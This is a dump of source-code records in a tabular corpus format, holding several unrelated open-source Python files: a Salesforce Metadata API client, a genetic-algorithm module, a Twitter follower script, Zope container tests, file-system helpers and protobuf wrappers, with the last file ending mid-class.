repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
rbauction/sfdclib | sfdclib/metadata.py | 1 | 10823 | """ Class to work with Salesforce Metadata API """
from base64 import b64encode, b64decode
from xml.etree import ElementTree as ET
import sfdclib.messages as msg
class SfdcMetadataApi:
""" Class to work with Salesforce Metadata API """
_METADATA_API_BASE_URI = "/services/Soap/m/{version}"
_XML_NAMESPACES = {
'soapenv': 'http://schemas.xmlsoap.org/soap/envelope/',
'mt': 'http://soap.sforce.com/2006/04/metadata'
}
def __init__(self, session):
if not session.is_connected():
raise Exception("Session must be connected prior to instantiating this class")
self._session = session
self._deploy_zip = None
def _get_api_url(self):
return "%s%s" % (
self._session.get_server_url(),
self._METADATA_API_BASE_URI.format(**{'version': self._session.get_api_version()}))
def deploy(self, zipfile, options):
""" Kicks off async deployment, returns deployment id """
check_only = ""
if 'checkonly' in options:
check_only = "<met:checkOnly>%s</met:checkOnly>" % options['checkonly']
test_level = ""
if 'testlevel' in options:
test_level = "<met:testLevel>%s</met:testLevel>" % options['testlevel']
tests_tag = ""
if 'tests' in options:
for test in options['tests']:
tests_tag += "<met:runTests>%s</met:runTests>\n" % test
attributes = {
'client': 'Metahelper',
'checkOnly': check_only,
'sessionId': self._session.get_session_id(),
'ZipFile': self._read_deploy_zip(zipfile),
'testLevel': test_level,
'tests': tests_tag
}
request = msg.DEPLOY_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'deploy'}
res = self._session.post(self._get_api_url(), headers=headers, data=request)
if res.status_code != 200:
raise Exception(
"Request failed with %d code and error [%s]" %
(res.status_code, res.text))
async_process_id = ET.fromstring(res.text).find(
'soapenv:Body/mt:deployResponse/mt:result/mt:id',
self._XML_NAMESPACES).text
state = ET.fromstring(res.text).find(
'soapenv:Body/mt:deployResponse/mt:result/mt:state',
self._XML_NAMESPACES).text
return async_process_id, state
@staticmethod
def _read_deploy_zip(zipfile):
if hasattr(zipfile, 'read'):
file = zipfile
file.seek(0)
should_close = False
else:
file = open(zipfile, 'rb')
should_close = True
raw = file.read()
if should_close:
file.close()
return b64encode(raw).decode("utf-8")
def _retrieve_deploy_result(self, async_process_id):
""" Retrieves status for specified deployment id """
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'asyncProcessId': async_process_id,
'includeDetails': 'true'
}
mt_request = msg.CHECK_DEPLOY_STATUS_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkDeployStatus'}
res = self._session.post(self._get_api_url(), headers=headers, data=mt_request)
root = ET.fromstring(res.text)
result = root.find(
'soapenv:Body/mt:checkDeployStatusResponse/mt:result',
self._XML_NAMESPACES)
if result is None:
raise Exception("Result node could not be found: %s" % res.text)
return result
def check_deploy_status(self, async_process_id):
""" Checks whether deployment succeeded """
result = self._retrieve_deploy_result(async_process_id)
state = result.find('mt:status', self._XML_NAMESPACES).text
state_detail = result.find('mt:stateDetail', self._XML_NAMESPACES)
if state_detail is not None:
state_detail = state_detail.text
unit_test_errors = []
deployment_errors = []
if state == 'Failed':
# Deployment failures
failures = result.findall('mt:details/mt:componentFailures', self._XML_NAMESPACES)
for failure in failures:
deployment_errors.append({
'type': failure.find('mt:componentType', self._XML_NAMESPACES).text,
'file': failure.find('mt:fileName', self._XML_NAMESPACES).text,
'status': failure.find('mt:problemType', self._XML_NAMESPACES).text,
'message': failure.find('mt:problem', self._XML_NAMESPACES).text
})
# Unit test failures
failures = result.findall(
'mt:details/mt:runTestResult/mt:failures',
self._XML_NAMESPACES)
for failure in failures:
unit_test_errors.append({
'class': failure.find('mt:name', self._XML_NAMESPACES).text,
'method': failure.find('mt:methodName', self._XML_NAMESPACES).text,
'message': failure.find('mt:message', self._XML_NAMESPACES).text,
'stack_trace': failure.find('mt:stackTrace', self._XML_NAMESPACES).text
})
deployment_detail = {
'total_count': result.find('mt:numberComponentsTotal', self._XML_NAMESPACES).text,
'failed_count': result.find('mt:numberComponentErrors', self._XML_NAMESPACES).text,
'deployed_count': result.find('mt:numberComponentsDeployed', self._XML_NAMESPACES).text,
'errors': deployment_errors
}
unit_test_detail = {
'total_count': result.find('mt:numberTestsTotal', self._XML_NAMESPACES).text,
'failed_count': result.find('mt:numberTestErrors', self._XML_NAMESPACES).text,
'completed_count': result.find('mt:numberTestsCompleted', self._XML_NAMESPACES).text,
'errors': unit_test_errors
}
return state, state_detail, deployment_detail, unit_test_detail
def download_unit_test_logs(self, async_process_id):
""" Downloads Apex logs for unit tests executed during specified deployment """
result = self._retrieve_deploy_result(async_process_id)
print("Results: %s" % ET.tostring(result, encoding="us-ascii", method="xml"))
def retrieve(self, options):
""" Submits retrieve request """
# Compose unpackaged XML
unpackaged = ''
for metadata_type in options['unpackaged']:
members = options['unpackaged'][metadata_type]
unpackaged += '<types>'
for member in members:
unpackaged += '<members>{0}</members>'.format(member)
unpackaged += '<name>{0}</name></types>'.format(metadata_type)
# Compose retrieve request XML
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'apiVersion': self._session.get_api_version(),
'singlePackage': options['single_package'],
'unpackaged': unpackaged
}
request = msg.RETRIEVE_MSG.format(**attributes)
# Submit request
headers = {'Content-type': 'text/xml', 'SOAPAction': 'retrieve'}
res = self._session.post(self._get_api_url(), headers=headers, data=request)
if res.status_code != 200:
raise Exception(
"Request failed with %d code and error [%s]" %
(res.status_code, res.text))
# Parse results to get async Id and status
async_process_id = ET.fromstring(res.text).find(
'soapenv:Body/mt:retrieveResponse/mt:result/mt:id',
self._XML_NAMESPACES).text
state = ET.fromstring(res.text).find(
'soapenv:Body/mt:retrieveResponse/mt:result/mt:state',
self._XML_NAMESPACES).text
return async_process_id, state
def _retrieve_retrieve_result(self, async_process_id, include_zip):
""" Retrieves status for specified retrieval id """
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'asyncProcessId': async_process_id,
'includeZip': include_zip
}
mt_request = msg.CHECK_RETRIEVE_STATUS_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkRetrieveStatus'}
res = self._session.post(self._get_api_url(), headers=headers, data=mt_request)
root = ET.fromstring(res.text)
result = root.find(
'soapenv:Body/mt:checkRetrieveStatusResponse/mt:result',
self._XML_NAMESPACES)
if result is None:
raise Exception("Result node could not be found: %s" % res.text)
return result
def retrieve_zip(self, async_process_id):
""" Retrieves ZIP file """
result = self._retrieve_retrieve_result(async_process_id, 'true')
state = result.find('mt:status', self._XML_NAMESPACES).text
error_message = result.find('mt:errorMessage', self._XML_NAMESPACES)
if error_message is not None:
error_message = error_message.text
# Check if there are any messages
messages = []
message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES)
for message in message_list:
messages.append({
'file': message.find('mt:fileName', self._XML_NAMESPACES).text,
'message': message.find('mt:problem', self._XML_NAMESPACES).text
})
# Retrieve base64 encoded ZIP file
zipfile_base64 = result.find('mt:zipFile', self._XML_NAMESPACES).text
zipfile = b64decode(zipfile_base64)
return state, error_message, messages, zipfile
def check_retrieve_status(self, async_process_id):
""" Checks whether retrieval succeeded """
result = self._retrieve_retrieve_result(async_process_id, 'false')
state = result.find('mt:status', self._XML_NAMESPACES).text
error_message = result.find('mt:errorMessage', self._XML_NAMESPACES)
if error_message is not None:
error_message = error_message.text
# Check if there are any messages
messages = []
message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES)
for message in message_list:
messages.append({
'file': message.find('mt:fileName', self._XML_NAMESPACES).text,
'message': message.find('mt:problem', self._XML_NAMESPACES).text
})
return state, error_message, messages
| mit | -2,345,350,160,945,566,700 | 42.119522 | 100 | 0.588931 | false |
bema-ligo/pycbc | pycbc/inference/sampler.py | 1 | 1386 | # Copyright (C) 2016 Christopher M. Biwer
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# =============================================================================
#
# Preamble
#
# =============================================================================
#
"""
This modules provides a list of implemented samplers for parameter estimation.
"""
import numpy
from pycbc.inference.sampler_kombine import KombineSampler
from pycbc.inference.sampler_emcee import EmceeEnsembleSampler, EmceePTSampler
# list of available samplers
samplers = {
KombineSampler.name : KombineSampler,
EmceeEnsembleSampler.name : EmceeEnsembleSampler,
EmceePTSampler.name : EmceePTSampler,
}
| gpl-3.0 | 3,212,687,464,336,453,600 | 36.459459 | 79 | 0.664502 | false |
handcraftsman/GeneticAlgorithmsWithPython | es/ch03/genetic.py | 1 | 3034 | # File: genetic.py
# Del capítulo 3 de _Algoritmos Genéticos con Python_
#
# Author: Clinton Sheppard <[email protected]>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import random
import statistics
import sys
import time
def _generar_padre(longitud, geneSet, obtener_aptitud):
genes = []
while len(genes) < longitud:
tamañoMuestral = min(longitud - len(genes), len(geneSet))
genes.extend(random.sample(geneSet, tamañoMuestral))
aptitud = obtener_aptitud(genes)
return Cromosoma(genes, aptitud)
def _mutar(padre, geneSet, obtener_aptitud):
genesDelNiño = padre.Genes[:]
índice = random.randrange(0, len(padre.Genes))
nuevoGen, alterno = random.sample(geneSet, 2)
genesDelNiño[índice] = alterno if nuevoGen == genesDelNiño[
índice] else nuevoGen
aptitud = obtener_aptitud(genesDelNiño)
return Cromosoma(genesDelNiño, aptitud)
def obtener_mejor(obtener_aptitud, longitudObjetivo, aptitudÓptima, geneSet,
mostrar):
random.seed()
def fnMutar(padre):
return _mutar(padre, geneSet, obtener_aptitud)
def fnGenerarPadre():
return _generar_padre(longitudObjetivo, geneSet, obtener_aptitud)
for mejora in _obtener_mejoras(fnMutar, fnGenerarPadre):
mostrar(mejora)
if not aptitudÓptima > mejora.Aptitud:
return mejora
def _obtener_mejoras(nuevo_niño, generar_padre):
mejorPadre = generar_padre()
yield mejorPadre
while True:
niño = nuevo_niño(mejorPadre)
if mejorPadre.Aptitud > niño.Aptitud:
continue
if not niño.Aptitud > mejorPadre.Aptitud:
mejorPadre = niño
continue
yield niño
mejorPadre = niño
class Cromosoma:
def __init__(self, genes, aptitud):
self.Genes = genes
self.Aptitud = aptitud
class Comparar:
@staticmethod
def ejecutar(función):
cronometrajes = []
stdout = sys.stdout
for i in range(100):
sys.stdout = None
horaInicio = time.time()
función()
segundos = time.time() - horaInicio
sys.stdout = stdout
cronometrajes.append(segundos)
promedio = statistics.mean(cronometrajes)
if i < 10 or i % 10 == 9:
print("{} {:3.2f} {:3.2f}".format(
1 + i, promedio,
statistics.stdev(cronometrajes, promedio) if i > 1 else 0))
| apache-2.0 | 243,886,378,590,808,930 | 30.684211 | 79 | 0.652492 | false |
basilhskk/ergasies | ergasia8.py | 1 | 1425 | #imports
import tweepy
from tweepy import OAuthHandler
#keys
ckey='...'
csecret='...'
atoken='...'
asecret='...'
#error handling twitter let me draw only 5000 ids at a time
try:
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)
#finding users id.
user1=raw_input("Give the first name: ")
user2=raw_input("Give me second name: ")
user=api.get_user(user1)
userid1=user.id
user=api.get_user(user2)
userid2=user.id
#collecting user1 followers.
fuser1 = tweepy.Cursor(api.followers_ids, id = userid1)
ids1=[]
for page in fuser1.pages():
ids1.extend(page)
#collecting user2 followers.
ids2=[]
fuser2 = tweepy.Cursor(api.followers_ids, id = userid2)
for page in fuser2.pages():
ids2.extend(page)
except BaseException, e:
print "Error",str(e)
#finding the mutual followers.
mids=[]
for i in range(0,len(ids1)):
if ids1[i] in ids2:
u= api.get_user(ids1[i])
mids.append(u.screen_name)
#printing final results.
if len(mids)==0:
print user1,"and",user2,"have no mutual followers."
elif len(mids)==1:
print "The mutual followers of",user1,"and",user2,"is:" ,[item.encode('utf-8') for item in mids]
else:
print "The mutual followers of",user1,"and",user2,"are:" ,[item.encode('utf-8') for item in mids]
| gpl-3.0 | -8,160,394,223,410,080,000 | 29.978261 | 101 | 0.669474 | false |
Donkyhotay/MoonPy | zope/app/container/browser/ftests/test_contents.py | 1 | 14353 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Functional tests for the Container's 'Contents' view
$Id: test_contents.py 67630 2006-04-27 00:54:03Z jim $
"""
import unittest
from persistent import Persistent
import transaction
from zope import copypastemove
from zope.interface import implements, Interface
from zope.annotation.interfaces import IAttributeAnnotatable
from zope.dublincore.interfaces import IZopeDublinCore
from zope.app.container.interfaces import IReadContainer, IContained
from zope.app.testing import ztapi
from zope.app.testing.functional import BrowserTestCase
from zope.app.testing.functional import FunctionalDocFileSuite
class IImmovable(Interface):
"""Marker interface for immovable objects."""
class IUncopyable(Interface):
"""Marker interface for uncopyable objects."""
class File(Persistent):
implements(IAttributeAnnotatable)
class ImmovableFile(File):
implements(IImmovable)
class UncopyableFile(File):
implements(IUncopyable)
class ObjectNonCopier(copypastemove.ObjectCopier):
def copyable(self):
return False
class ObjectNonMover(copypastemove.ObjectMover):
def moveable(self):
return False
class ReadOnlyContainer(Persistent):
implements(IReadContainer, IContained)
__parent__ = __name__ = None
def __init__(self): self.data = {}
def keys(self): return self.data.keys()
def __getitem__(self, key): return self.data[key]
def get(self, key, default=None): return self.data.get(key, default)
def __iter__(self): return iter(self.data)
def values(self): return self.data.values()
def __len__(self): return len(self.data)
def items(self): return self.data.items()
def __contains__(self, key): return key in self.data
def has_key(self, key): return self.data.has_key(key)
class Test(BrowserTestCase):
def test_inplace_add(self):
root = self.getRootFolder()
self.assert_('foo' not in root)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.File'})
body = ' '.join(response.getBody().split())
self.assert_(body.find('type="hidden" name="type_name"') >= 0)
self.assert_(body.find('input name="new_value"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.File',
'new_value': 'foo'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' in root)
def test_inplace_rename_multiple(self):
root = self.getRootFolder()
root['foo'] = File()
self.assert_('foo' in root)
transaction.commit()
# Check that we don't change mode if there are no items selected
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'container_rename_button': u''})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') < 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
< 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
>= 0)
self.assert_(body.find('div class="page_error"')
>= 0)
# Check normal multiple select
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'container_rename_button': u'',
'ids': ['foo']})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo'],
'new_value': ['bar']})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' not in root)
self.assert_('bar' in root)
def test_inplace_rename_single(self):
root = self.getRootFolder()
root['foo'] = File()
self.assert_('foo' in root)
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo']})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo'],
'new_value': ['bar']})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' not in root)
self.assert_('bar' in root)
def test_inplace_change_title(self):
root = self.getRootFolder()
root['foo'] = File()
transaction.commit()
self.assert_('foo' in root)
dc = IZopeDublinCore(root['foo'])
self.assert_(dc.title == '')
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'retitle_id': u'foo'})
body = ' '.join(response.getBody().split())
self.assert_(body.find('type="hidden" name="retitle_id"') >= 0)
self.assert_(body.find('input name="new_value"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'retitle_id': u'foo',
'new_value': u'test title'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' in root)
dc = IZopeDublinCore(root['foo'])
self.assert_(dc.title == 'test title')
def test_pasteable_for_deleted_clipboard_item(self):
"""Tests Paste button visibility when copied item is deleted."""
root = self.getRootFolder()
root['foo'] = File() # item to be copied/deleted
root['bar'] = File() # ensures that there's always an item in
# the collection view
transaction.commit()
# confirm foo in contents, Copy button visible, Paste not visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<a href="foo/@@SelectedManagementView.html">foo</a>') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_copy_button"') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
# copy foo - confirm Paste visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'ids' : ('foo',),
'container_copy_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# delete foo -> nothing valid to paste -> Paste should not be visible
del root['foo']
transaction.commit()
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
def test_paste_for_deleted_clipboard_item(self):
"""Tests paste operation when one of two copied items is deleted."""
root = self.getRootFolder()
root['foo'] = File()
root['bar'] = File()
transaction.commit()
# confirm foo/bar in contents, Copy button visible, Paste not visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<a href="foo/@@SelectedManagementView.html">foo</a>') != -1)
self.assert_(response.getBody().find(
'<a href="bar/@@SelectedManagementView.html">bar</a>') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_copy_button"') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
# copy foo and bar - confirm Paste visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'ids' : ('foo', 'bar'),
'container_copy_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# delete only foo -> bar still available -> Paste should be visible
del root['foo']
transaction.commit()
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# paste clipboard contents - only bar should be copied
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'container_paste_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
root._p_jar.sync()
self.assertEqual(tuple(root.keys()), ('bar', 'bar-2'))
def test_readonly_display(self):
root = self.getRootFolder()
root['foo'] = ReadOnlyContainer()
transaction.commit()
response = self.publish('/foo/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
def test_uncopyable_object(self):
ztapi.provideAdapter(IUncopyable,
copypastemove.interfaces.IObjectCopier,
ObjectNonCopier)
root = self.getRootFolder()
root['uncopyable'] = UncopyableFile()
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'ids': [u'uncopyable'],
'container_copy_button': u'Copy'})
self.assertEqual(response.getStatus(), 200)
body = response.getBody()
self.assert_("cannot be copied" in body)
def test_unmoveable_object(self):
ztapi.provideAdapter(IImmovable,
copypastemove.interfaces.IObjectMover,
ObjectNonMover)
root = self.getRootFolder()
root['immovable'] = ImmovableFile()
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'ids': [u'immovable'],
'container_cut_button': u'Cut'})
self.assertEqual(response.getStatus(), 200)
body = response.getBody()
self.assert_("cannot be moved" in body)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(FunctionalDocFileSuite("index.txt"))
return suite
if __name__=='__main__':
unittest.main(defaultTest='test_suite')
| gpl-3.0 | -3,529,249,201,198,915,000 | 40.363112 | 78 | 0.561416 | false |
jimzhan/pyx | rex/core/fs.py | 1 | 4479 | # -*- coding: utf-8 -*-
"""
Functions that interact with local file system.
"""
from __future__ import with_statement
import os
import shutil
import logging
import itertools
from rex.core import regex
logger = logging.getLogger(__name__)
#==========================================================================================
# General/Common Properties
#==========================================================================================
sysroot = os.path.abspath('/')
userdir = os.path.expanduser('~')
def realpath(path):
"""
Create the real absolute path for the given path.
Add supports for userdir & / supports.
Args:
* path: pathname to use for realpath.
Returns:
Platform independent real absolute path.
"""
if path == '~':
return userdir
if path == '/':
return sysroot
if path.startswith('/'):
return os.path.abspath(path)
if path.startswith('~/'):
return os.path.expanduser(path)
if path.startswith('./'):
return os.path.abspath(os.path.join(os.path.curdir, path[2:]))
return os.path.abspath(path)
def find(pattern, path=os.path.curdir, recursive=False):
"""
Find absolute file/folder paths with the given ``re`` pattern.
Args:
* pattern: search pattern, support both string (exact match) and `re` pattern.
* path: root path to start searching, default is current working directory.
* recursive: whether to recursively find the matched items from `path`, False by default
Returns:
Generator of the matched items of Files/Folders.
"""
root = realpath(path)
Finder = lambda item: regex.is_regex(pattern) \
and pattern.match(item) or (pattern == item)
if recursive:
for base, dirs, files in os.walk(root, topdown=True):
for segment in itertools.chain(filter(Finder, files), filter(Finder, dirs)):
yield FS(os.path.join(base, segment))
else:
for segment in filter(Finder, os.listdir(root)):
yield(os.path.join(root, segment))
class FS(object):
"""
Generic file system object.
Attributes:
* path: absolute path of the file system object.
"""
def __init__(self, path, *args, **kwargs):
self.path = realpath(path)
def __unicode__(self):
return self.path
def __repr__(self):
return self.path
@property
def exists(self):
return os.path.exists(self.path)
@property
def name(self):
return os.path.basename(self.path)
def copy(self, dest):
"""
Copy item to the given `dest` path.
Args:
* dest: destination path to copy.
"""
if os.path.isfile(self.path):
shutil.copy2(self.path, dest)
else:
shutil.copytree(self.path, dest, symlinks=False, ignore=None)
def create(self):
"""
Create item under file system with its path.
Returns:
True if its path does not exist, False otherwise.
"""
if os.path.isfile(self.path):
if not os.path.exists(self.path):
with open(self.path, 'w') as fileobj:
fileobj.write('')
else:
os.makedirs(self.path)
def delete(self):
"""
Delete the file/folder itself from file system.
"""
if os.path.isfile(self.path):
os.remove(self.path)
else:
shutil.rmtree(self.path)
def move(self, dest):
"""
Move item to the given `dest` path.
Args:
* dest: destination path to move.
"""
shutil.move(self.path, dest)
def flush(self):
"""
Commit the marked action, against `revert`.
"""
raise NotImplementedError
def revert(self):
"""
Revert the last action.
"""
raise NotImplementedError
class File(FS):
def create(self):
"""
Create item under file system with its path.
Returns:
True if its path does not exist, False otherwise.
"""
if not os.path.exists(self.path):
with open(self.path, 'w') as fileobj:
fileobj.write('')
class Folder(FS):
def create(self):
"""
Recursively create the folder using its path.
"""
os.makedirs(self.path)
| apache-2.0 | -6,516,505,945,339,783,000 | 21.852041 | 96 | 0.546997 | false |
chengsoonong/acton | acton/proto/wrappers.py | 1 | 16442 | """Classes that wrap protobufs."""
import json
from typing import Union, List, Iterable
import acton.database
import acton.proto.acton_pb2 as acton_pb
import acton.proto.io
import google.protobuf.json_format as json_format
import numpy
import sklearn.preprocessing
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
def validate_db(db: acton_pb.Database):
"""Validates a Database proto.
Parameters
----------
db
Database to validate.
Raises
------
ValueError
"""
if db.class_name not in acton.database.DATABASES:
raise ValueError('Invalid database class name: {}'.format(
db.class_name))
if not db.path:
raise ValueError('Must specify db.path.')
def deserialise_encoder(
encoder: acton_pb.Database.LabelEncoder
) -> sklearn.preprocessing.LabelEncoder:
"""Deserialises a LabelEncoder protobuf.
Parameters
----------
encoder
LabelEncoder protobuf.
Returns
-------
sklearn.preprocessing.LabelEncoder
LabelEncoder (or None if no encodings were specified).
"""
encodings = []
for encoding in encoder.encoding:
encodings.append((encoding.class_int, encoding.class_label))
encodings.sort()
encodings = numpy.array([c[1] for c in encodings])
encoder = SKLabelEncoder()
encoder.classes_ = encodings
return encoder
class LabelPool(object):
"""Wrapper for the LabelPool protobuf.
Attributes
----------
proto : acton_pb.LabelPool
Protobuf representing the label pool.
db_kwargs : dict
Key-value pairs of keyword arguments for the database constructor.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
def __init__(self, proto: Union[str, acton_pb.LabelPool]):
"""
Parameters
----------
proto
Path to .proto file, or raw protobuf itself.
"""
try:
self.proto = acton.proto.io.read_proto(proto, acton_pb.LabelPool)
except TypeError:
if isinstance(proto, acton_pb.LabelPool):
self.proto = proto
else:
raise TypeError('proto should be str or LabelPool protobuf.')
self._validate_proto()
self.db_kwargs = {kwa.key: json.loads(kwa.value)
for kwa in self.proto.db.kwarg}
if len(self.proto.db.label_encoder.encoding) > 0:
self.label_encoder = deserialise_encoder(
self.proto.db.label_encoder)
self.db_kwargs['label_encoder'] = self.label_encoder
else:
self.label_encoder = None
self._set_default()
@classmethod
def deserialise(cls, proto: bytes, json: bool=False) -> 'LabelPool':
"""Deserialises a protobuf into a LabelPool.
Parameters
----------
proto
Serialised protobuf.
json
Whether the serialised protobuf is in JSON format.
Returns
-------
LabelPool
"""
if not json:
lp = acton_pb.LabelPool()
lp.ParseFromString(proto)
return cls(lp)
return cls(json_format.Parse(proto, acton_pb.LabelPool()))
@property
def DB(self) -> acton.database.Database:
"""Gets a database context manager for the specified database.
Returns
-------
type
Database context manager.
"""
if hasattr(self, '_DB'):
return self._DB
self._DB = lambda: acton.database.DATABASES[self.proto.db.class_name](
self.proto.db.path, **self.db_kwargs)
return self._DB
@property
def ids(self) -> List[int]:
"""Gets a list of IDs.
Returns
-------
List[int]
List of known IDs.
"""
if hasattr(self, '_ids'):
return self._ids
self._ids = list(self.proto.id)
return self._ids
@property
def labels(self) -> numpy.ndarray:
"""Gets labels array specified in input.
Notes
-----
The returned array is cached by this object so future calls will not
need to recompile the array.
Returns
-------
numpy.ndarray
T x N x F NumPy array of labels.
"""
if hasattr(self, '_labels'):
return self._labels
ids = self.ids
with self.DB() as db:
return db.read_labels([0], ids)
def _validate_proto(self):
"""Checks that the protobuf is valid and enforces constraints.
Raises
------
ValueError
"""
validate_db(self.proto.db)
def _set_default(self):
"""Adds default parameters to the protobuf."""
@classmethod
def make(
cls: type,
ids: Iterable[int],
db: acton.database.Database) -> 'LabelPool':
"""Constructs a LabelPool.
Parameters
----------
ids
Iterable of instance IDs.
db
Database
Returns
-------
LabelPool
"""
proto = acton_pb.LabelPool()
# Store the IDs.
for id_ in ids:
proto.id.append(id_)
# Store the database.
proto.db.CopyFrom(db.to_proto())
return cls(proto)
class Predictions(object):
"""Wrapper for the Predictions protobuf.
Attributes
----------
proto : acton_pb.Predictions
Protobuf representing predictions.
db_kwargs : dict
Dictionary of database keyword arguments.
label_encoder : sklearn.preprocessing.LabelEncoder
Encodes labels as integers. May be None.
"""
